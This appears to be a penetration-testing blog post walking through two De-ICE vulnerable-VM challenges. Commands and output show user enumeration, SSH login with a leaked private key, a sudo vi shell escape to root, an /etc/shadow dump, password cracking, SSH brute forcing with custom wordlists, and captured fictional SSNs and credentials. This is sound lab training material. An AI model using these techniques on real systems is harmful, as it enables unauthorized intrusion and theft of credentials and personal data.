Spoiler

All posts tagged Spoiler

I had never done the S2 LiveCD; honestly I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean up to date walkthrough using Kali. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S2.100

Download Link: https://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.iso

Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff.

Default IP: 192.168.2.100

Flags:
1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
4. FINAL FLAG: Find salary and Social Security Information for employees

Spoilers and Walkthrough

Using netdiscover to find the potential addresses I found the .100 and .101 addresses active.

root@kali:~# netdiscover

 Currently scanning: 192.168.4.0/16   |   Screen View: Unique Hosts            
                                                                               
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:08      1      60  Unknown vendor              
 192.168.2.2     00:50:56:f0:ee:65      1      60  Unknown vendor              
 192.168.2.100   00:0c:29:1f:c6:f0      1      60  Unknown vendor              
 192.168.2.101   00:0c:29:1f:c6:f0      1      60  Unknown vendor              
 192.168.2.254   00:50:56:fe:3a:17      1      60  Unknown vendor

I’ll start by creating a metasploit workspace and doing a port scan of the host. The name for the workspace is terrible but since I didn’t know that I would be differentiating between series 1 and 2 but it works.

workspace -a de-ice2-100
workspace de-ice2-100
db_nmap -T5 -p 0-65535 -A 192.168.2.100-101

I have had great success in numerous penetration tests with data in FTP so I will start there. Personally I like to use the filezilla GUI, I know that goes against everything that makes pen testing fun so feel free to use the command line. The anonymous user doesn’t perform a directory listing or show any files so lets dig into the vsftpd service. Searchsploit is the local version of the exploit-db database with the added benefit of not having to click on the CAPTCHA box.

root@kali:~# searchsploit vsftp
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
--------------------------------------------- ----------------------------------

Nothing specific for that version and mostly denial-of-service attacks so for now we can move on. Lets see what mischief we can get into with the web site. From the website directory we can harvest a list of users and email addresses for use later. In a real-world penetration test this would be the start for a well orchestrated phishing campaign.

Samuel Pickwickpickwick@herot.net
Nathaniel Winklewinkle@herot.net
Augustus Snodgrasssnodgrass@herot.net
Tracy Tupmantupman@herot.net
Sam Wellerweller@herot.net
Tony Wellertweller@herot.net
Estella Havishamhavisham@herot.net
Abel Magwitchmagwitch@herot.net
Philip Pirrippirrip@herot.net
Nicholas Nicklebynickleby@herot.net
Ralph Nicklebyrnickleby@herot.net
Newman Noggsnoggs@herot.net
Wackford Squeerssqueers@herot.net
Thomas Pinchpinch@herot.net
Mark Tapleytapley@herot.net
Sarah Gampgamp@herot.net
Jacob Marleymarley@herot.net
Ebenezer Scroogescrooge@herot.net
Bob Cratchitcratchit@herot.net
Bill Sikessikes@herot.net
Jack Dawkinsdawkins@herot.net
Noah Claypoleclaypole@herot.net

The .101 website looks like a generic policy site so lets dig deeper into bother of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.

nikto -h 192.168.2.100
nikto -h 192.168.2.101
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

Lets rummage around in that directory. Nada.

During the Nmap scan we found out that the SMTP server has the VRFY verb enabled allowing us to determine potential user accounts for a brute force attack. The list is fairly simple, last name only, first name only, and first initial last name.

Pickwick
Winkle
Snodgrass
Tupman
Weller
Weller
Havisham
Magwitch
Pirrip
Nickleby
Nickleby
Noggs
Squeers
Pinch
Tapley
Gamp
Marley
Scrooge
Cratchit
Sikes
Dawkins
Claypole
Samuel
Nathaniel
Augustus
Tracy
Sam
Tony
Estella
Abel
Philip
Nicholas
Ralph
Newman
Wackford
Thomas
Mark
Sarah
Jacob
Ebenezer
Bob
Bill
Jack
Noah
spickwick
nwinkle
asnodgrass
ttupman
sweller
tweller
ehavisham
amagwitch
ppirrip
nnickleby
rnickleby
nnoggs
wsqueers
tpinch
mtapley
sgamp
jmarley
escrooge
bcratchit
bsikes
jdawkins
nclaypole

Metasploit has an SMTP enumeration module that we will use.

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt
USER_FILE => /root/Desktop/s2100users.txt
msf auxiliary(smtp_enum) > set RHOSTS 192.168.2.100
RHOSTS => 192.168.2.100
msf auxiliary(smtp_enum) > run

[*] 192.168.2.100:25      - 192.168.2.100:25 Banner: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT
[+] 192.168.2.100:25      - 192.168.2.100:25 Users found: Havisham, Magwitch, Pirrip
[*] Scanned 1 of 1 hosts (100% complete)

We now have three verified usernames to start an attack (Havisham, Magwitch, Pirrip). The .101 address had a ~root directory that was readable so lets check for those user directories. Good news, there aren’t any files in these either but all three exist. What files do we expect to see in a users home folder? I made a dump of my home folder to answer this question and some of the items that are obviously penetration testing tools. Linux hides folders that start with a . so lets dump this into a wordlist and get started.

root@kali:~# ls -a
.              core       .ICEauthority  .nano              Templates
..             Desktop    .install4j     .oracle_jre_usage  Videos
.bash_history  Documents  .java          Pictures           .w3af
.bashrc        Downloads  .john          .profile           .wget-hsts
.bundle        .faraday   .local         Public
.BurpSuite     .gconf     .mozilla       .rnd
.cache         .gnupg     .msf4          .sqlmap
.config        .halberd   Music          .ssh
Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                Required  Description
   ----        ---------------                --------  -----------
   DICTIONARY  /root/Desktop/webwordlist.txt  no        Path of word dictionary to use
   PATH        /~root                         yes       The path  to identify files
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.2.101                  yes       The target address range or CIDR identifier
   RPORT       80                             yes       The target port (TCP)
   SSL         false                          no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                            yes       The number of concurrent threads
   VHOST                                      no        HTTP server virtual host

msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~root/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~root/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~magwitch
PATH => /~magwitch
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~magwitch/./ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~magwitch/../ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~havisham
PATH => /~havisham
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~havisham/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~havisham/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~pirrip
PATH => /~pirrip
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~pirrip/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/./ 200 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/.ssh/ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The bold line above doesn’t show up in the other three but it has a 404 error which is odd also the /./ is a 200 code instead of a 404. Lets take a closer look.

.SSH Folder

Figure 1 – .SSH Folder

That sure looks like it exists. Lets take a quick detour into SSH to explain why this is important. SSH allows for password based authentication like we saw in the De-ICE series 1 LiveCDs it also can use Public Key encryption which relies on a generated public/private key pair. Having the id_rsa file is almost as good as having a the password in cleartext. Copy those two files to your .ssh local folder. Linux gets really upset if you don’t have 600 permissions set on id_rsa files so this saves a step of getting the error message, looking up the fix, and trying again.

root@kali:~/Desktop# ssh -i id_rsa pirrip@192.168.2.100
The authenticity of host '192.168.2.100 (192.168.2.100)' can't be established.
RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.2.100' (RSA) to the list of known hosts.
Linux 2.6.16.
pirrip@slax:~$ id
uid=1000(pirrip) gid=10(wheel) groups=10(wheel)
pirrip@slax:~$ su -
Password: ****
Sorry.

We don’t know the password so even being a member of the wheel group doesn’t help much. There isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or meterpreter shell. In this case since this is the only system in scope let look at other potential data sources. We know this is a mail server so:

pirrip@slax:~$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N  1 Abel Magwitch      Sun Jan 13 23:53   20/748   Estella
 N  2 Estella Havisham   Sun Jan 13 23:53   20/780   welcome to the team
 N  3 Abel Magwitch      Sun Jan 13 23:53   20/875   havisham
 N  4 Estella Havisham   Mon Jan 14 00:05   20/861   next month
 N  5 Abel Magwitch      Mon Jan 14 00:05   20/868   vacation
 N  6 Abel Magwitch      Mon Jan 14 00:05   20/915   vacation
 N  7 noreply@fermion.he Mon Jan 14 00:05   29/983   Fermion Account Login Rem
? 
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Will do.

? 
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Thanks!  Glad to be here.

? 
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

I set her up with an accountus servers.  I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.

? 
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

? 
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Hey, I'll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

? 
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Sure - so far, she's doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

? 
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support


E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

From the email exchange we have to potential sets of credentials havisham:changeme and pirrip:0l1v3rTw1st. Lets try to get elevated privileges with the pirrip password first, since we are already logged in.

pirrip@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

 #1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.

Password:
User pirrip may run the following commands on this host:
 (root) /usr/bin/more
 (root) /usr/bin/tail
 (root) /usr/bin/vi
 (root) /usr/bin/cat ALL

vi can be used to get shell, I learned this in a long drawn out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi the :! command instructs vi to execute a shell command, lets try it.

pirrip@slax:~$ sudo vi

:!/bin/sh
sh-3.1# cat /etc/shadow
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

:q

Use :q to exit vi. Feed the password hashes to John or Hashcat and let it cook! Time passes, seasons change. The wedding dress becomes torn and the feast rots on the table, I had to read Charles Dickens in college.

rootP1ckw1ckP@p3rs
havishamchangeme
pirrip0l1v3rTw1st
magwitch
pirrip@slax:~$ su -
Password: **************
root@slax:~# ls -a
./   .ICEauthority  .Xresources  .fluxbox/       .fonts.conf  .joerc  .kderc   .mc/       .qt/    Desktop/
../  .Xauthority    .config/     .fonts.cache-1  .icons@      .kde/   .local/  .mplayer/  .save/  Set\ IP\ address
root@slax:~# cd .save
root@slax:~/.save# ls -a
./  ../  great_expectations.zip*

We found the file but how do we get it over to our system to check it out? There are a few possible options.

  1. Build a netcat listener and pipe the file over.
  2. Move the file to the FTP root and copy it across.
  3. Move it to the ~root directory and download it from the website.

Netcat is installed on server and this is an option but I am lazy so I ran the following commands to copy the file to the website and give read permissions to everyone:

/home/root/.save# cp great_expectations.zip /www/101/home/root/
chmod 744 great_expectations.zip
Archive on Website

Figure 2 – Archive on Website

After copying it to the local system unzip the archive and untar the file from the zip.

unzip great_expectations.zip
tar -xzf great_expectations.tar
Archive Contents

Figure 3 – Archive Contents

The greatest piece of advice that I have received on Linux is how to remember the tar switches; say the following in a thick cartoonish german accent ‘Extract Zee Files’. tar -xzf, will this sound dumb when you do it? Yes. Will you remember it without looking at help? Yes.

The Charles_Dickens_3.jpg and Great_Expectations.pdf are pretty self explanatory. Lets look at the Jan08 file cat.

root@kali:~/Desktop/s2-100/great_expectations# cat Jan08 
From sikes@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <sikes@slax.example.net>
Received: from slax.example.net (localhost [127.0.0.1])
    by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636
    for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:47:48 GMT
Received: (from sikes@slax.example.net)
    by slax.example.net (8.13.7/8.13.7/Submit) id m0DNlmDI009635
    for pirrip; Sun, 13 Jan 2008 23:47:48 GMT
From: Bill Sikes <sikes@slax.example.net>
Message-Id: <200801132347.m0DNlmDI009635@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Raises
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's the data for raises for your team:
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325

That is the data we were looking for. But, what about that other .jpg file that won’t do a preview? It won’t open in image software, maybe they are trying to obfuscate the file type by changing the extension? Use the file command in Linux to analyze the type.

file 363px-Charles_dickensyoung.jpg 
363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)

Thats not a JPG at all! Lets rename the file and take a look inside. Maybe that Jan08 file was a decoy. Nope it as just a second copy of the original archive but now you know how to file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not to many flags to deal with. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.130

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso

Default IP: Not so fast buddy, that is one of the flags

Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts bank information

Spoilers and Walkthrough

Port scan the image to get started. At this point I was having everyone do this through the metasploit console instead of stand alone.

msfconsole
workspace deice
db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24

You will need to exclude your own IP, 192.168.1.128 is mine. If you are running any other known systems on your network add them to the exclude with a comma to separate the list.

msf > hosts

Hosts
=====

address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.1    00:50:56:c0:00:08        Unknown                    device         
192.168.1.2    00:50:56:e6:1d:4b        Unknown                    device         
192.168.1.20   00:0c:29:a4:37:1e        Unknown                    device         
192.168.1.123  00:0c:29:a4:37:1e  slax  Linux               2.6.X  server

.1 and .2 are the VMWare NAT. You can check those but trust me. .123 is a different De-ICE LiveCD that is included in the same database because I’m lazy. Looks like 192.168.1.20 is the one.

netdiscover is another tool that looks for ARP requests to discover live hosts. While it isn’t integrated into metasploit I’ve used it on penetration tests to locate hosts for zero knowledge internal tests.

netdiscover

 Currently scanning: 192.168.66.0/16   |   Screen View: Unique Hosts                                      

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     00:50:56:c0:00:08      1      60  Unknown vendor                                         
 192.168.1.2     00:50:56:e7:84:3f      1      60  Unknown vendor                                         
 192.168.1.20    00:0c:29:1f:c6:f0      1      60  Unknown vendor                                         
 192.168.1.254   00:50:56:f9:37:34      1      60  Unknown vendor

The -sV and -O combination is the same as -A but I’ve separated it out just to have this line of text to tell you that. When I originally did these walkthrough the notes because progressively less detailed since the small group was getting better each week. Since these are now stand alone I will add a little more detail hence the time mismatch.

msf > db_nmap -sV -O -F 192.168.1.20 
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT    STATE  SERVICE VERSION
[*] Nmap: 21/tcp  open   ftp     vsftpd 2.0.4
[*] Nmap: 22/tcp  open   ssh     OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp  open   smtp    Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp  open   http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open   pop3    Openwall popa3d
[*] Nmap: 143/tcp open   imap    UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.13 - 2.6.32
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: slax.example.net; OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds

In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel to performing vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again for this test. Nikto uses a custom User Agent string Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). This can be changed in the /etc/nikto.conf file or the scan can be piped through the Burp proxy and used to change the User Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans since it is known bad traffic.

nikto -h 192.168.1.20

http://192.168.1.20/info.php has good info. The /info.php page is good on any test and will usually be a finding in the penetration test report.

Logging into the FTP site as anonymous throws an error so no viable path there.

Connected to 192.168.1.20.
220 (vsFTPd 2.0.4)
Name (192.168.1.20:root): anonymous
230 Login successful.
ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek

In parallel start a password attack on SSH using rockyou and root. See the S1.100 Tutorial for info on how to set it up. While the brute force attack runs, lets look at some other low hanging fruit.

Lets start by looking at the SMTP server.

use auxiliary/scanner/smtp/smtp_enum

The SMTP server pops back some good info, lets follow that rabbit hole down. We have one possible username from the website (customerserviceadmin@nosecbank.com). Lets build out a list for potential attacks.

customerserviceadmin
customeradmin
csadmin
adm
bin
daemon
dbadmin
ftp
gdm
operator
postmaster
sysadmin
webmaster

After some time passes you should return a password. I used xHydra so show the GUI interface but any password cracking tool will work.

[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.1.20:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.20:22
[22][ssh] host: 192.168.1.20   login: csadmin   password: rocker

SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.

csadmin@192.168.1.20's password: 
Linux 2.6.16.
csadmin@slax:~$ ls
mailserv_download/
csadmin@slax:~$ cd mailserv_download/
csadmin@slax:~/mailserv_download$ ls
2010122014234.j12Gqo4H049241  2010122216451.f81Ltw4R010211.part2

Multiple file names … part2 … better figure that out next. Maybe, I can just read the text part with cat.

csadmin@slax:~/mailserv_download$ cat *      
To: csadmin@nosecbank.com
CC: 
Subject: My Son's Birthday
Date: Mon, 20 Dec 2010 14:23:46 +0500
Return-Path: <sdadmin@nosecbank.com>
Delivered-To: csadmin:nosecbank.com@nosecbank.com
Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000
X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com; 
20 Dec 2010 09:23:46 -0000
Received: from www.nosecbank.com (unknown [198.65.139.34]) by 
srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for 
<csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT)
Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com>
Mime-Version: 1.0
Content-Type: multipart/alternative; 
boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80"
X-Mailer: K-Mail; Build 1.0.5510
Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms==
Message: Hey Mark, I am curious if you would be free to come over and 
visit for my son Donovin's birthday tomorrow after work.  I would also 
appreciate if you brought Andy with you as well, because Donny 
really enjoyed playing with him last time he was over.  I know its short 
notice but he is turning 12 and it is special for both him and me. Let 
me know if this works. Thanks!  -Paul

///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////

Lets build a second attack based on the content of that email.

Username
sdadmin


Passwords
donovin
Donovin
donovin21
Donovin21
donovin98
Donovin98
donovin1221
Donovin1221
donovin122198
Donovin122198
donovin12211998
Donovin12211998
donovin211998
Donovin211998
donovin1998
Donovin1998

Second verse same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don’t trust people like Fred.

dbadmin


 
databaser
Databaser
databaser1
databaser2
databaser3
databaser4
databaser5
databaser6
databaser7
databaser8
databaser9
databaser0
databaser!
databaser@
databaser#
databaser$
databaser%
databaser^
databaser&
databaser*
databaser(
databaser)
Databaser1
Databaser2
Databaser3
Databaser4
Databaser5
Databaser6
Databaser7
Databaser8
Databaser9
Databaser0
Databaser!
Databaser@
Databaser#
Databaser$
Databaser%
Databaser^
Databaser&
Databaser*
Databaser(
Databaser)
databaser10
databaser11
databaser12
databaser13
databaser14
databaser15
databaser16
databaser17
databaser18
databaser19
databaser20
databaser21
databaser22
databaser23
databaser24
databaser25
databaser26
databaser27
databaser28
databaser29
databaser30
databaser31
databaser32
databaser33
databaser34
databaser35
databaser36
databaser37
databaser38
databaser39
databaser40
databaser41
databaser42
databaser43
databaser44
databaser45
databaser46
databaser47
databaser48
databaser49
databaser50
databaser51
databaser52
databaser53
databaser54
databaser55
databaser56
databaser57
databaser58
databaser59
databaser60
databaser61
databaser62
databaser63
databaser64
databaser65
databaser66
databaser67
databaser68
databaser69
databaser70
databaser71
databaser72
databaser73
databaser74
databaser75
databaser76
databaser77
databaser78
databaser79
databaser80
databaser81
databaser82
databaser83
databaser84
databaser85
databaser86
databaser87
databaser88
databaser89
databaser90
databaser91
databaser92
databaser93
databaser94
databaser95
databaser96
databaser97
databaser98
databaser99
Databaser10
Databaser11
Databaser12
Databaser13
Databaser14
Databaser15
Databaser16
Databaser17
Databaser18
Databaser19
Databaser20
Databaser21
Databaser22
Databaser23
Databaser24
Databaser25
Databaser26
Databaser27
Databaser28
Databaser29
Databaser30
Databaser31
Databaser32
Databaser33
Databaser34
Databaser35
Databaser36
Databaser37
Databaser38
Databaser39
Databaser40
Databaser41
Databaser42
Databaser43
Databaser44
Databaser45
Databaser46
Databaser47
Databaser48
Databaser49
Databaser50
Databaser51
Databaser52
Databaser53
Databaser54
Databaser55
Databaser56
Databaser57
Databaser58
Databaser59
Databaser60
Databaser61
Databaser62
Databaser63
Databaser64
Databaser65
Databaser66
Databaser67
Databaser68
Databaser69
Databaser70
Databaser71
Databaser72
Databaser73
Databaser74
Databaser75
Databaser76
Databaser77
Databaser78
Databaser79
Databaser80
Databaser81
Databaser82
Databaser83
Databaser84
Databaser85
Databaser86
Databaser87
Databaser88
Databaser89
Databaser90
Databaser91
Databaser92
Databaser93
Databaser94
Databaser95
Databaser96
Databaser97
Databaser98
Databaser99

Hey look .part1 lets put all that together. I had to cook this part from another walkthrough because java programming is not my forte. The code can be found at the bottom of this post, I named the file Decoder.java but you can be as creative as you want.

javac Decoder.java

java Decoder sysadmin

java Decoder root

Once you find this file (useracc_update.csv.enc) try the openssl decryption similar to earlier de-ice challenges. Hint look in the sysadmin profile.

root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-128-cbc decryption password:
bad decrypt
25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-256-cbc decryption password:
bad decrypt
25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2
root@slax:/home/ftp/incoming# cat user
useracc_update.csv      useracc_update.csv.enc  
root@slax:/home/ftp/incoming# cat useracc_update.csv
ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code
1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490
1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345
1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631
1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353
1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223
1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441
1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557
1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315
